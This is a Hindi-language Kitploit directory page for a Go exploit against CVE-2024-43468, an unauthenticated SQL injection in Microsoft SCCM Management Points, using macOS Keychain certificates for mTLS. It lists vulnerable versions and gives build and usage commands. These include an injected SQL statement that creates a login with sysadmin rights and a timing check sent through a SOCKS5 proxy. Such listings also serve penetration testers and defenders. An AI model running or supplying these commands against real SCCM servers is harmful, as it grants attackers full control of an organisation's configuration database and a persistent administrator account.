Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-43468_mTLS_go — CVE-2024-43468 SCCM SQL इंजेक्शन एक्सप्लॉइट (MacOS कीचेन संस्करण से mTLS गैर-निकालने योग्य क्लाइंट सर्टिफिकेट) | Kitploit
उपकरण/GitHubGitHub/nikallass/cve-2024-43468_mtls_go
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगप्रमाणीकरणरेड टीमिंग
GitHubnikallass/cve-2024-43468_mtls_go

CVE-2024-43468_mTLS_go

CVE-2024-43468 SCCM SQL इंजेक्शन एक्सप्लॉइट (MacOS कीचेन संस्करण से mTLS गैर-निकालने योग्य क्लाइंट सर्टिफिकेट)

रिपॉजिटरी देखें
321 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-43468 SCCM SQL Injection Exploit (mTLS क्लाइंट प्रमाणपत्र macOS कीचेन संस्करण से)

CVE-2024-43468 शोषण का Go कार्यान्वयन जो mTLS प्रमाणीकरण के लिए macOS कीचेन का उपयोग करता है (कीचेन से कुंजियाँ निर्यात करने की आवश्यकता नहीं है)।

इसके अतिरिक्त:

  • समस्याग्रस्त proxychains का उपयोग न करने हेतु प्रॉक्सी समर्थन जोड़ा गया।
  • प्रमाणपत्र का Common Name प्राप्त करने के लिए get_cert_name.py जोड़ा गया (हाँ, आप इसे Keychain Access GUI से मैन्युअल रूप से भी कर सकते हैं)।
  • यह देखने के लिए बहुत सारी डिबगिंग जोड़ी गई कि क्या चल रहा है।

आधारित:

  • मूल Python शोषण
  • mTLS Go क्लाइंट उदाहरण

विवरण

Microsoft Configuration Manager (ConfigMgr / SCCM) में अप्रमाणित SQL इंजेक्शन का शोषण करता है, जो नेटवर्क पहुँच रखने वाले हमलावर को Management Point पर साइट डेटाबेस में मनमानी SQL क्वेरी निष्पादित करने की अनुमति देता है।

संवेदनशील संस्करण:

  • < 2403 (5.00.9128.1024)
  • < 2309 (5.00.9122.1033)
  • < 2303 (5.00.9106.1037)
  • <= 2211

स्थापना

root@kitploit:~
# Clone repository
git clone https://github.com/nikallass/CVE-2024-43468_mTLS_go
cd CVE-2024-43468_mTLS_go

# Install dependencies
go get github.com/google/uuid
go get golang.org/x/net/proxy

# Build
go build -o sccm

उपयोग

root@kitploit:~
# Show help
./sccm -h

# Basic usage (creating new admin)
./sccm -t https://sccm-mp.local \
       -sql "create login user123 with password = 'Password123'; exec master.dbo.sp_addsrvrolemember 'user123', 'sysadmin'" \
       -cn "CertificateCommonName"

# With custom proxy (check with sleep 5)
./sccm -t https://sccm-mp.local \
       -sql "WAITFOR DELAY '0:0:5'" \
       -cn "CertificateCommonName" \
       -proxy "127.0.0.1:9050"

पैरामीटर

  • -t : लक्ष्य URL (आवश्यक)
  • -sql : निष्पादित की जाने वाली SQL क्वेरी (आवश्यक)
  • -cn : macOS कीचेन में प्रमाणपत्र का Common Name (आवश्यक)
  • -proxy : SOCKS5 प्रॉक्सी पता (डिफ़ॉल्ट: खाली)

आवश्यकताएँ

  • macOS (कीचेन एकीकरण के लिए)
  • Go 1.16+
  • macOS कीचेन में क्लाइंट प्रमाणपत्र
  • वैकल्पिक: SOCKS5 प्रॉक्सी

संदर्भ

  • Microsoft सलाह
  • Synacktiv सलाह
  • mTLS Go क्लाइंट उदाहरण
टूल डाउनलोड करें